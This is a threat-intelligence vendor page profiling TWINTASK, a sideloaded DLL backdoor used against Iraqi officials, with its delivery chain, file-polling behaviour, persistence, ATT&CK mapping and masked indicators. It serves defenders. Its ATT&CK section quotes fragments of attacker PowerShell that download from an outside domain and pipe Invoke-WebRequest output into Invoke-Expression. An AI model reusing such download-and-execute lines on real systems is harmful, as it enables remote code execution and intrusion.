Skip to main content
Live Webinar with SANS (June 25)— Agentic CTI Automation for Fun & ProfitRegister Free
Mallory
Back to malware
MalwareUsed by 1 actor

TWINTASK

TWINTASK is a malicious DLL, observed as libvlc.dll, used in a January 2026 campaign targeting Iraqi government officials and attributed with medium-to-high confidence by Zscaler ThreatLabz to the suspected Iran-nexus actor Dust Specter. It was delivered by the SPLITDROP .NET dropper in a password-protected RAR archive impersonating Iraq’s Ministry of Foreign Affairs, then sideloaded by a legitimate VLC executable. TWINTASK functions as a worker component in a two-part malware architecture with TWINTALK as the command-and-control orchestrator. It polls C:\ProgramData\PolGuid\in.txt every 15 seconds for Base64-encoded PowerShell commands, decodes and executes them, and writes output and errors to C:\ProgramData\PolGuid\out.txt. It also launches WingetUI.exe to sideload the TWINTALK DLL (hostfxr.dll). Persistence is established through Windows Registry Run keys that relaunch VLC.exe and WingetUI.exe after reboot. The malware was used in targeted espionage activity against Iraqi government personnel; associated malware in the same campaign included SPLITDROP, TWINTALK, and GHOSTFORM. High-confidence file and path indicators mentioned in the reporting include libvlc.dll, C:\ProgramData\PolGuid\in.txt, C:\ProgramData\PolGuid\out.txt, C:\ProgramData\PolGuid\VLC\VLC.exe, and C:\ProgramData\PolGuid\WingetUI\WingetUI.exe.

Share:
For your environment

Hunt this family in your stack

Mallory pivots from this family to the IOCs, detections, and named campaigns that touch your stack, and pages you when something new lands.

Start free trial
THREAT ACTORS

Groups observed using it

1 distinct threat actor attributed by public researchers. Open in Mallory to see the full evidence chain and overlapping campaigns.

View more details
Dust Specter

It subsequently extracts and launches VLC.exe, which sideloads a malicious libvlc.dll identified as TWINTASK. TWINTASK maintains persistence by polling C:\ProgramData\PolGuid\in.txt every 15 seconds for Base64-encoded PowerShell commands.

via centripetal threat researchcentripetal.ai
MITRE ATT&CK

Techniques & procedures

10 distinct techniques documented for this family, organized by ATT&CK tactic.

Initial Access

2 techniques
T1566PhishingEvidence3

Initial access continued to rely on spear phishing — delivering macro-enabled documents or malicious links.

T1566.001Spearphishing AttachmentEvidence1

Initial access continued to rely on spear phishing — delivering macro-enabled documents or malicious links

Execution

5 techniques
T1053Scheduled Task/JobEvidence1

Persistence was maintained through web shells and scheduled tasks

T1059Command and Scripting InterpreterEvidence2

Attack Chain 2 delivered GHOSTFORM, consolidating all functionality into a single binary using an invisible Windows form for delayed execution, in-memory PowerShell command execution

T1059.001PowerShellEvidence7

TWINTASK maintains persistence by polling C:\ProgramData\PolGuid\in.txt every 15 seconds for Base64-encoded PowerShell commands.

T1204User ExecutionEvidence3

In recent years, Iranian-linked threat actors have commonly used phishing (T1566) as the primary vector for initial access, often leading to execution via user execution (T1204) of malicious files

T1574.001DLLEvidence2

"...uses DLL sideloading with legitimate software such as VLC and WingetUI."

Persistence

2 techniques
T1053Scheduled Task/JobEvidence1

Persistence was maintained through web shells and scheduled tasks

T1547.001Registry Run Keys / Startup FolderEvidence6

Attack Chain 1 used SPLITDROP, a .NET dropper delivering TWINTASK and TWINTALK via DLL sideloading into legitimate VLC.exe and WingetUI.exe processes, establishing file-based command polling through in.txt and out.txt with persistence via Windows Run registry keys.

Privilege Escalation

2 techniques
T1053Scheduled Task/JobEvidence1

Persistence was maintained through web shells and scheduled tasks

T1547.001Registry Run Keys / Startup FolderEvidence6

Attack Chain 1 used SPLITDROP, a .NET dropper delivering TWINTASK and TWINTALK via DLL sideloading into legitimate VLC.exe and WingetUI.exe processes, establishing file-based command polling through in.txt and out.txt with persistence via Windows Run registry keys.

Stealth

2 techniques
T1036MasqueradingEvidence2

“Defense evasion … masquerading (T1036)” and examples include “C# malware masquerading as PDF documents,” “fake 404 error pages,” and impersonation of collaboration platforms.

T1574.001DLLEvidence2

"...uses DLL sideloading with legitimate software such as VLC and WingetUI."

Command and Control

1 technique
T1105Ingress Tool TransferEvidence2

“Add-Type … HttpClient … GetAsync('https://meetingapp.site/webexdownload') … WriteAllBytes” / “Invoke-WebRequest … .content | Invoke-Expression”

INDICATORS OF COMPROMISE

IOCs tracked for this family

5 indicators attributed across vendor reports, sandbox runs, and researcher write-ups. Full values are available in Mallory.

View more in app
Network
4 tracked

IPs, domains, and DNS infrastructure linked to this family.

Other
1 tracked

Other indicator types observed in public reporting.

TypeValueLatest sighting
domain●●●●●●●●●●●●View more in app3 months ago
domain●●●●●●●●●●●●View more in app3 months ago
domain●●●●●●●●●●●●View more in app3 months ago
domain●●●●●●●●●●●●View more in app3 months ago
uri●●●●●●●●●●●●View more in app4 months ago
ACTIVITY FEED

Recent activity

10 sources tracked across advisories, community write-ups, and news. New activity surfaces here as Mallory finds it.

10 SOURCESView more in app
centripetal threat researchNews
Mar 20, 2026
Pre-Positioned Access: The Cyber Threat Behind the Iran… | Centripetal

A DLL-sideloaded backdoor that maintains persistence and polls a local file for Base64-encoded PowerShell commands.

Read more
ctoatncsc substackNews
Mar 7, 2026
CTO at NCSC Summary: week ending March 8th

A follow-on payload dropped by SPLITDROP in the Dust Specter attack chain (functionality not described in the provided content).

Read more
security affairsNews
Mar 6, 2026
Iran-nexus APT Dust Specter targets Iraq officials with new malware

Worker module that executes PowerShell commands (from a local file) as part of the SPLITDROP/TWINTALK infection chain.

Read more
risky biz rssNews
Mar 6, 2026
Iranian hackers are scanning for security cameras to aid missile strike

Malware used in suspected Iranian APT activity targeting Iraqi government officials.

Read more
+6 more in the timeline
What this page doesn’t show

The version that knows your environment.

This page is what’s public. Mallory adds the parts that aren’t: which of your assets match these IOCs, which detections are missing, which campaigns to expect next, and what to do in the next 30 minutes.
Start free trial
IOC matching5

Match every observed IP, domain, and hash against your live telemetry.

Threat actor attribution1

Named campaigns wielding this family, with evidence pinned to each claim.

Exploited vulnerabilities

CVEs this family uses for access and lateral movement.

Detection signatures

YARA, Sigma, Snort, and vendor rules, auto-deployed to your SIEM.

MITRE ATT&CK mapping10

Every documented technique, ranked by evidence weight.

Researcher chatter

Reddit, Mastodon, and CTI community discussion around this family.